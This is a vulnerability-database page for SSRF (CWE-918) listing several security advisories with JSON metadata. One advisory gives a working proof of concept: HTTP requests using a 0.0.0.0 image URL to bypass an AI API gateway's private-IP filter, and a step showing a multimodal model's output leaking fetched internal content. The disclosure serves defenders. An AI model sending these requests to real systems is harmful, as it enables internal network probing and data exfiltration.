CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4629 vulnerabilities reference this CWE, most recent first.
GHSA-V4QH-6367-4CX2
Vulnerability from github – Published: 2020-02-04 22:38 – Updated: 2021-08-19 16:54Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class which reads a URL from the Location header, and then sends a GET or DELETE request to this URL. It may allow to implement a SSRF attack. If an attacker tricks a client to connect to a malicious server, the server can make the client call any URL including internal resources which are not directly accessible by the attacker.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.7.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.apache.olingo:odata-client-core"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-1925"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2020-02-04T22:35:18Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class which reads a URL from the Location header, and then sends a GET or DELETE request to this URL. It may allow to implement a SSRF attack. If an attacker tricks a client to connect to a malicious server, the server can make the client call any URL including internal resources which are not directly accessible by the attacker.",
"id": "GHSA-v4qh-6367-4cx2",
"modified": "2021-08-19T16:54:36Z",
"published": "2020-02-04T22:38:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1925"
},
{
"type": "WEB",
"url": "https://mail-archives.apache.org/mod_mbox/olingo-user/202001.mbox/%3CCAGSZ4d6HwpF2woOrZJg_d0SkHytXJaCtAWXa3ZtBn33WG0YFvw%40mail.gmail.com%3E"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Server-Side Request Forgery (SSRF) in Apache Olingo"
}
GHSA-V57F-FQVF-VC6V
Vulnerability from github – Published: 2025-02-03 15:32 – Updated: 2026-04-01 18:33Server-Side Request Forgery (SSRF) vulnerability in NotFound Traveler Layout Essential For Elementor. This issue affects Traveler Layout Essential For Elementor: from n/a through 1.0.8.
{
"affected": [],
"aliases": [
"CVE-2025-22701"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-03T15:15:19Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in NotFound Traveler Layout Essential For Elementor. This issue affects Traveler Layout Essential For Elementor: from n/a through 1.0.8.",
"id": "GHSA-v57f-fqvf-vc6v",
"modified": "2026-04-01T18:33:31Z",
"published": "2025-02-03T15:32:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22701"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/traveler-layout-essential-for-elementor/vulnerability/wordpress-traveler-layout-essential-for-elementor-plugin-1-0-8-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5C3-6WVC-PC2Q
Vulnerability from github – Published: 2026-05-06 17:23 – Updated: 2026-05-13 13:38SSRF Filter Bypass via 0.0.0.0
Summary
The SSRF protection introduced in v0.9.0.5 (CVE-2025-59146) and hardened in v0.9.6 (CVE-2025-62155) does not block the unspecified address 0.0.0.0. A regular (non-admin) user holding any valid API token can send a multimodal request to /v1/chat/completions, /v1/responses, or /v1/messages with 0.0.0.0 as the image/file URL host, bypassing the private-IP filter and causing the server to issue HTTP requests to localhost. This constitutes at minimum a blind SSRF; when the request is routed through an AWS/Bedrock Claude adaptor, the fetched content is inlined into the model response, upgrading it to a full-read SSRF.
Details
Root Cause
common/ssrf_protection.go — isPrivateIP() (lines 33–47) checks the following ranges:
10.0.0.0/8172.16.0.0/12192.168.0.0/16127.0.0.0/8169.254.0.0/16224.0.0.0/4240.0.0.0/4
0.0.0.0/8 is not checked. On Linux, 0.0.0.0 resolves to the local machine, same as 127.0.0.1.
Default Fetch Settings
setting/system_setting/fetch_setting.go (lines 16–24) defaults:
EnableSSRFProtection: trueAllowPrivateIp: falseAllowedPorts: ["80", "443", "8080", "8443"]ApplyIPFilterForDomain: true
So 0.0.0.0 on any of these four ports passes all checks.
Data Flow (primary chain — /v1/chat/completions)
User API token
→ /v1/chat/completions (TokenAuth, no admin required)
→ messages[].content[].image_url.url = "http://0.0.0.0:8080/..."
→ dto/openai_request.go:111-117 createFileSource() recognises http(s):// as URL source
→ dto/openai_request.go:119-198 GetTokenCountMeta() collects image_url.url / file.file_data / video_url
→ service/token_counter.go:237-264 LoadFileSource() fetches URL when shouldFetchFiles == true
→ service/file_service.go:135-143 loadFromURL() → DoDownloadRequest()
→ service/download.go:52-68 ValidateURLWithFetchSetting() → 0.0.0.0 NOT blocked → GetHttpClient().Get()
→ Server issues real TCP connection to 0.0.0.0
Note on stream requirement: common/init.go (lines 140–141) defaults GET_MEDIA_TOKEN=true but GET_MEDIA_TOKEN_NOT_STREAM=false, so stream: true is needed to trigger the fetch path.
Additional Affected Endpoints
The same ValidateURLWithFetchSetting() → DoDownloadRequest() sink is reachable from:
| Endpoint | User-controlled field | Auth required |
|---|---|---|
/v1/chat/completions |
image_url.url, file.file_data, video_url |
Regular user token |
/v1/responses |
input_file.file_url, input_image.image_url |
Regular user token |
/v1/messages |
source.url (type: "url") |
Regular user token |
/api/user/setting |
webhook_url, bark_url, gotify_url |
Regular user (self) |
Upgrade to Full-Read SSRF (conditional)
relay/channel/aws/adaptor.go (lines 41–61) — ConvertClaudeRequest():
- If the request is routed to an AWS/Bedrock Claude channel, the adaptor iterates over message content
- When
source.type == "url", it callsservice.GetBase64Data()which invokes the sameDoDownloadRequest()path - The fetched content is rewritten to
type: "base64"and inlined into the model request - The model then describes/transcribes the content in its response
This means an attacker can read the actual content of internal resources (images, PDFs, text) through the model's output, not just detect open/closed ports.
Proof of Concept
Prerequisites: A regular user account with a valid API token. No admin privileges required.
Step 1 — Control group: 127.0.0.1 is blocked
POST /v1/chat/completions HTTP/1.1
Host: <redacted>
Authorization: Bearer sk-<user-token>
Content-Type: application/json
{
"model": "gpt-4o-mini",
"stream": true,
"max_tokens": 1,
"messages": [
{
"role": "user",
"content": [
{"type": "text", "text": "describe"},
{
"type": "image_url",
"image_url": {
"url": "http://127.0.0.1:8080/probe.png",
"detail": "low"
}
}
]
}
]
}
Response:
private IP address not allowed: 127.0.0.1
Step 2 — Experiment group: 0.0.0.0 bypasses the filter
POST /v1/chat/completions HTTP/1.1
Host: <redacted>
Authorization: Bearer sk-<user-token>
Content-Type: application/json
{
"model": "gpt-4o-mini",
"stream": true,
"max_tokens": 1,
"messages": [
{
"role": "user",
"content": [
{"type": "text", "text": "describe"},
{
"type": "image_url",
"image_url": {
"url": "http://0.0.0.0:8080/probe.png",
"detail": "low"
}
}
]
}
]
}
Response:
dial tcp 0.0.0.0:8080: connect: connection refused
The server attempted a real TCP connection — the SSRF filter was bypassed.
Step 3 — Confirm readback capability via multimodal model
POST /v1/chat/completions HTTP/1.1
Host: <redacted>
Authorization: Bearer sk-<user-token>
Content-Type: application/json
{
"model": "claude-3-5-sonnet-latest",
"stream": false,
"max_tokens": 32,
"messages": [
{
"role": "user",
"content": [
{
"type": "text",
"text": "Transcribe exactly the text in the image. Output only the text."
},
{
"type": "image_url",
"image_url": {
"url": "https://dummyimage.com/600x180/111/fff.png&text=READBACK-OK-314159",
"detail": "low"
}
}
]
}
]
}
Response:
{"choices":[{"message":{"content":"READBACK-OK-314159"}}]}
This confirms that when the fetch target returns readable content (image/PDF/text), the model's response leaks that content to the attacker. Combining Step 2 and Step 3: if an internal service on 0.0.0.0:<allowed-port> returns image or document content, an attacker can exfiltrate it.
Impact
An authenticated regular user (no admin privileges) can:
- Probe localhost and internal services — Determine open/closed ports on the server by observing
connection refusedvs timeout vs HTTP-level errors. Default allowed ports are 80, 443, 8080, and 8443. - Exfiltrate internal content — When the request routes through a multimodal model (especially AWS/Bedrock Claude), the server fetches the resource and the model returns its content (OCR for images, summarization for PDFs/text).
- Bypass all previous SSRF mitigations — This is a direct bypass of the
isPrivateIP()check. No redirect chain, no DNS rebinding, no race condition required — just replacing127.0.0.1with0.0.0.0.
Since user registration is often enabled by default, any registered user can exploit this.
Suggested Fix
- Add
0.0.0.0/8to the deny list inisPrivateIP()(common/ssrf_protection.go) - Audit against the full [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/) — also ensure coverage for:
0.0.0.0/8("This network")100.64.0.0/10(Carrier-grade NAT)198.18.0.0/15(Benchmarking)- IPv6 equivalents:
::1,::,[::],fe80::/10 - Apply the same IP validation to post-redirect targets (already partially addressed in
service/http_client.go:24-33, but does not help when the initial address itself bypasses the filter)
Resources
- CVE-2025-59146 (GHSA-xxv6-m6fx-vfhh): Original authenticated SSRF, patched in v0.9.0.5
- CVE-2025-62155 (GHSA-9f46-w24h-69w4): 302 redirect bypass of the SSRF fix, patched in v0.9.6
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/QuantumNous/new-api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.11.9-alpha.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42339"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-06T17:23:21Z",
"nvd_published_at": "2026-05-08T23:16:36Z",
"severity": "HIGH"
},
"details": "# SSRF Filter Bypass via `0.0.0.0` \n\n### Summary\n\nThe SSRF protection introduced in v0.9.0.5 (CVE-2025-59146) and hardened in v0.9.6 (CVE-2025-62155) does not block the unspecified address `0.0.0.0`. A regular (non-admin) user holding any valid API token can send a multimodal request to `/v1/chat/completions`, `/v1/responses`, or `/v1/messages` with `0.0.0.0` as the image/file URL host, bypassing the private-IP filter and causing the server to issue HTTP requests to localhost. This constitutes at minimum a **blind SSRF**; when the request is routed through an AWS/Bedrock Claude adaptor, the fetched content is inlined into the model response, upgrading it to a **full-read SSRF**.\n\n### Details\n\n#### Root Cause\n\n`common/ssrf_protection.go` \u2014 `isPrivateIP()` (lines 33\u201347) checks the following ranges:\n\n- `10.0.0.0/8`\n- `172.16.0.0/12`\n- `192.168.0.0/16`\n- `127.0.0.0/8`\n- `169.254.0.0/16`\n- `224.0.0.0/4`\n- `240.0.0.0/4`\n\n**`0.0.0.0/8` is not checked.** On Linux, `0.0.0.0` resolves to the local machine, same as `127.0.0.1`.\n\n#### Default Fetch Settings\n\n`setting/system_setting/fetch_setting.go` (lines 16\u201324) defaults:\n\n- `EnableSSRFProtection: true`\n- `AllowPrivateIp: false`\n- `AllowedPorts: [\"80\", \"443\", \"8080\", \"8443\"]`\n- `ApplyIPFilterForDomain: true`\n\nSo `0.0.0.0` on any of these four ports passes all checks.\n\n#### Data Flow (primary chain \u2014 `/v1/chat/completions`)\n\n```\nUser API token\n\u2192 /v1/chat/completions (TokenAuth, no admin required)\n\u2192 messages[].content[].image_url.url = \"http://0.0.0.0:8080/...\"\n\u2192 dto/openai_request.go:111-117 createFileSource() recognises http(s):// as URL source\n\u2192 dto/openai_request.go:119-198 GetTokenCountMeta() collects image_url.url / file.file_data / video_url\n\u2192 service/token_counter.go:237-264 LoadFileSource() fetches URL when shouldFetchFiles == true\n\u2192 service/file_service.go:135-143 loadFromURL() \u2192 DoDownloadRequest()\n\u2192 service/download.go:52-68 ValidateURLWithFetchSetting() \u2192 0.0.0.0 NOT blocked \u2192 GetHttpClient().Get()\n\u2192 Server issues real TCP connection to 0.0.0.0\n```\n\n**Note on stream requirement:** `common/init.go` (lines 140\u2013141) defaults `GET_MEDIA_TOKEN=true` but `GET_MEDIA_TOKEN_NOT_STREAM=false`, so `stream: true` is needed to trigger the fetch path.\n\n#### Additional Affected Endpoints\n\nThe same `ValidateURLWithFetchSetting()` \u2192 `DoDownloadRequest()` sink is reachable from:\n\n| Endpoint | User-controlled field | Auth required |\n|---|---|---|\n| `/v1/chat/completions` | `image_url.url`, `file.file_data`, `video_url` | Regular user token |\n| `/v1/responses` | `input_file.file_url`, `input_image.image_url` | Regular user token |\n| `/v1/messages` | `source.url` (type: `\"url\"`) | Regular user token |\n| `/api/user/setting` | `webhook_url`, `bark_url`, `gotify_url` | Regular user (self) |\n\n#### Upgrade to Full-Read SSRF (conditional)\n\n`relay/channel/aws/adaptor.go` (lines 41\u201361) \u2014 `ConvertClaudeRequest()`:\n\n- If the request is routed to an AWS/Bedrock Claude channel, the adaptor iterates over message content\n- When `source.type == \"url\"`, it calls `service.GetBase64Data()` which invokes the same `DoDownloadRequest()` path\n- The fetched content is rewritten to `type: \"base64\"` and inlined into the model request\n- The model then describes/transcribes the content in its response\n\nThis means an attacker can read the actual content of internal resources (images, PDFs, text) through the model\u0027s output, not just detect open/closed ports.\n\n### Proof of Concept\n\n**Prerequisites:** A regular user account with a valid API token. No admin privileges required.\n\n**Step 1 \u2014 Control group: `127.0.0.1` is blocked**\n\n```http\nPOST /v1/chat/completions HTTP/1.1\nHost: \u003credacted\u003e\nAuthorization: Bearer sk-\u003cuser-token\u003e\nContent-Type: application/json\n\n{\n \"model\": \"gpt-4o-mini\",\n \"stream\": true,\n \"max_tokens\": 1,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"text\", \"text\": \"describe\"},\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": \"http://127.0.0.1:8080/probe.png\",\n \"detail\": \"low\"\n }\n }\n ]\n }\n ]\n}\n```\n\nResponse:\n\n```\nprivate IP address not allowed: 127.0.0.1\n```\n\n**Step 2 \u2014 Experiment group: `0.0.0.0` bypasses the filter**\n\n```http\nPOST /v1/chat/completions HTTP/1.1\nHost: \u003credacted\u003e\nAuthorization: Bearer sk-\u003cuser-token\u003e\nContent-Type: application/json\n\n{\n \"model\": \"gpt-4o-mini\",\n \"stream\": true,\n \"max_tokens\": 1,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"text\", \"text\": \"describe\"},\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": \"http://0.0.0.0:8080/probe.png\",\n \"detail\": \"low\"\n }\n }\n ]\n }\n ]\n}\n```\n\nResponse:\n\n```\ndial tcp 0.0.0.0:8080: connect: connection refused\n```\n\nThe server attempted a real TCP connection \u2014 the SSRF filter was bypassed.\n\n**Step 3 \u2014 Confirm readback capability via multimodal model**\n\n```http\nPOST /v1/chat/completions HTTP/1.1\nHost: \u003credacted\u003e\nAuthorization: Bearer sk-\u003cuser-token\u003e\nContent-Type: application/json\n\n{\n \"model\": \"claude-3-5-sonnet-latest\",\n \"stream\": false,\n \"max_tokens\": 32,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"text\",\n \"text\": \"Transcribe exactly the text in the image. Output only the text.\"\n },\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": \"https://dummyimage.com/600x180/111/fff.png\u0026text=READBACK-OK-314159\",\n \"detail\": \"low\"\n }\n }\n ]\n }\n ]\n}\n```\n\nResponse:\n\n```json\n{\"choices\":[{\"message\":{\"content\":\"READBACK-OK-314159\"}}]}\n```\n\nThis confirms that when the fetch target returns readable content (image/PDF/text), the model\u0027s response leaks that content to the attacker. Combining Step 2 and Step 3: if an internal service on `0.0.0.0:\u003callowed-port\u003e` returns image or document content, an attacker can exfiltrate it.\n\n### Impact\n\nAn authenticated regular user (no admin privileges) can:\n\n1. **Probe localhost and internal services** \u2014 Determine open/closed ports on the server by observing `connection refused` vs timeout vs HTTP-level errors. Default allowed ports are 80, 443, 8080, and 8443.\n2. **Exfiltrate internal content** \u2014 When the request routes through a multimodal model (especially AWS/Bedrock Claude), the server fetches the resource and the model returns its content (OCR for images, summarization for PDFs/text).\n3. **Bypass all previous SSRF mitigations** \u2014 This is a direct bypass of the `isPrivateIP()` check. No redirect chain, no DNS rebinding, no race condition required \u2014 just replacing `127.0.0.1` with `0.0.0.0`.\n\nSince user registration is often enabled by default, any registered user can exploit this.\n\n### Suggested Fix\n\n1. Add `0.0.0.0/8` to the deny list in `isPrivateIP()` (`common/ssrf_protection.go`)\n2. Audit against the full [[IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/)](https://www.iana.org/assignments/iana-ipv4-special-registry/) \u2014 also ensure coverage for:\n - `0.0.0.0/8` (\"This network\")\n - `100.64.0.0/10` (Carrier-grade NAT)\n - `198.18.0.0/15` (Benchmarking)\n - IPv6 equivalents: `::1`, `::`, `[::]`, `fe80::/10`\n3. Apply the same IP validation to post-redirect targets (already partially addressed in `service/http_client.go:24-33`, but does not help when the initial address itself bypasses the filter)\n\n### Resources\n\n- **CVE-2025-59146** (GHSA-xxv6-m6fx-vfhh): Original authenticated SSRF, patched in v0.9.0.5\n- **CVE-2025-62155** (GHSA-9f46-w24h-69w4): 302 redirect bypass of the SSRF fix, patched in v0.9.6",
"id": "GHSA-v5c3-6wvc-pc2q",
"modified": "2026-05-13T13:38:24Z",
"published": "2026-05-06T17:23:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-v5c3-6wvc-pc2q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42339"
},
{
"type": "PACKAGE",
"url": "https://github.com/QuantumNous/new-api"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-9f46-w24h-69w4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "QuantumNous/new-api has an SSRF Filter Bypass via 0.0.0.0"
}
GHSA-V5C4-WCPJ-X73M
Vulnerability from github – Published: 2026-06-26 23:03 – Updated: 2026-06-26 23:03Impact
The Glide image proxy's URL validation could be bypassed using DNS rebinding. The remote hostname was validated as publicly routable, but resolved again when the image was actually fetched, so an attacker controlling the hostname's DNS could rebind it to an internal address after validation. This could cause the server to make HTTP requests to internal addresses — including loopback, private network, and cloud metadata endpoints.
This affects sites that pass user-supplied URLs to Glide.
Patches
This has been fixed in 5.73.24 and 6.20.1.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "statamic/cms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.73.24"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "statamic/cms"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0"
},
{
"fixed": "6.20.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54242"
],
"database_specific": {
"cwe_ids": [
"CWE-367",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T23:03:28Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Impact\n\nThe Glide image proxy\u0027s URL validation could be bypassed using DNS rebinding. The remote hostname was validated as publicly routable, but resolved again when the image was actually fetched, so an attacker controlling the hostname\u0027s DNS could rebind it to an internal address after validation. This could cause the server to make HTTP requests to internal addresses \u2014 including loopback, private network, and cloud metadata endpoints.\n\nThis affects sites that pass user-supplied URLs to Glide.\n\n\n### Patches\n\nThis has been fixed in 5.73.24 and 6.20.1.",
"id": "GHSA-v5c4-wcpj-x73m",
"modified": "2026-06-26T23:03:29Z",
"published": "2026-06-26T23:03:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/statamic/cms/security/advisories/GHSA-v5c4-wcpj-x73m"
},
{
"type": "PACKAGE",
"url": "https://github.com/statamic/cms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Statamic Vulnerable to Server-Side Request Forgery via Glide (DNS rebinding)"
}
GHSA-V5F5-7FMG-8VMH
Vulnerability from github – Published: 2024-04-02 06:30 – Updated: 2024-08-28 21:31Server Side Request Forgery (SSRF) vulnerability in 71cms v1.0.0, allows remote unauthenticated attackers to obtain sensitive information via getweather.html.
{
"affected": [],
"aliases": [
"CVE-2024-25187"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-02T04:15:12Z",
"severity": "HIGH"
},
"details": "Server Side Request Forgery (SSRF) vulnerability in 71cms v1.0.0, allows remote unauthenticated attackers to obtain sensitive information via getweather.html.",
"id": "GHSA-v5f5-7fmg-8vmh",
"modified": "2024-08-28T21:31:27Z",
"published": "2024-04-02T06:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25187"
},
{
"type": "WEB",
"url": "https://github.com/xiaocheng-keji/71cms/issues/2"
},
{
"type": "WEB",
"url": "https://gist.github.com/wisejayer/d365e93ce09b8a36641165e1d1a0a06c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-V5G3-MW88-C3JM
Vulnerability from github – Published: 2023-03-31 21:30 – Updated: 2023-04-10 18:30forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.
{
"affected": [],
"aliases": [
"CVE-2023-27160"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-31T19:15:00Z",
"severity": "HIGH"
},
"details": "forem up to v2022.11.11 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /articles/{id}. This vulnerability allows attackers to access network resources and sensitive information via a crafted POST request.",
"id": "GHSA-v5g3-mw88-c3jm",
"modified": "2023-04-10T18:30:22Z",
"published": "2023-03-31T21:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27160"
},
{
"type": "WEB",
"url": "https://gist.github.com/b33t1e/6172286862a4486b5888f3cbbdc6316d"
},
{
"type": "WEB",
"url": "https://github.com/forem/forem"
},
{
"type": "WEB",
"url": "https://notes.sjtu.edu.cn/s/MUUhEymt7"
},
{
"type": "WEB",
"url": "http://forem.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V5G8-P43F-VV3P
Vulnerability from github – Published: 2024-04-06 21:30 – Updated: 2024-08-01 15:31An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.
{
"affected": [],
"aliases": [
"CVE-2024-27620"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-06T19:15:07Z",
"severity": "HIGH"
},
"details": "An issue in Ladder v.0.0.1 thru v.0.0.21 allows a remote attacker to obtain sensitive information via a crafted request to the API.",
"id": "GHSA-v5g8-p43f-vv3p",
"modified": "2024-08-01T15:31:37Z",
"published": "2024-04-06T21:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27620"
},
{
"type": "WEB",
"url": "https://everywall.github.io"
},
{
"type": "WEB",
"url": "https://packetstormsecurity.com/files/177506/Ladder-0.0.21-Server-Side-Request-Forgery.html"
},
{
"type": "WEB",
"url": "http://ladder.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5J5-586P-Q8QM
Vulnerability from github – Published: 2024-12-17 06:30 – Updated: 2024-12-17 06:30The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.
{
"affected": [],
"aliases": [
"CVE-2024-9624"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-17T06:15:21Z",
"severity": "HIGH"
},
"details": "The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.",
"id": "GHSA-v5j5-586p-q8qm",
"modified": "2024-12-17T06:30:34Z",
"published": "2024-12-17T06:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9624"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve"
},
{
"type": "WEB",
"url": "https://www.wpallimport.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5JF-XRP6-XCRP
Vulnerability from github – Published: 2022-05-14 02:57 – Updated: 2022-05-14 02:57An SSRF vulnerability was discovered in idreamsoft iCMS before V7.0.11 because the remote function in app/spider/spider_tools.class.php does not block private and reserved IP addresses such as 10.0.0.0/8. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-14514.
{
"affected": [],
"aliases": [
"CVE-2018-14858"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-08-02T20:29:00Z",
"severity": "HIGH"
},
"details": "An SSRF vulnerability was discovered in idreamsoft iCMS before V7.0.11 because the remote function in app/spider/spider_tools.class.php does not block private and reserved IP addresses such as 10.0.0.0/8. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-14514.",
"id": "GHSA-v5jf-xrp6-xcrp",
"modified": "2022-05-14T02:57:53Z",
"published": "2022-05-14T02:57:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14858"
},
{
"type": "WEB",
"url": "https://github.com/idreamsoft/iCMS/issues/33"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5QC-4RXP-7VRF
Vulnerability from github – Published: 2025-08-20 15:31 – Updated: 2025-08-20 15:31CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized access to sensitive data when an attacker sends a specially crafted document to a vulnerable endpoint.
{
"affected": [],
"aliases": [
"CVE-2025-54924"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-20T14:15:46Z",
"severity": "HIGH"
},
"details": "CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized access to sensitive data when an attacker sends a specially crafted document to a vulnerable endpoint.",
"id": "GHSA-v5qc-4rxp-7vrf",
"modified": "2025-08-20T15:31:42Z",
"published": "2025-08-20T15:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54924"
},
{
"type": "WEB",
"url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-224-02\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2025-224-02.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.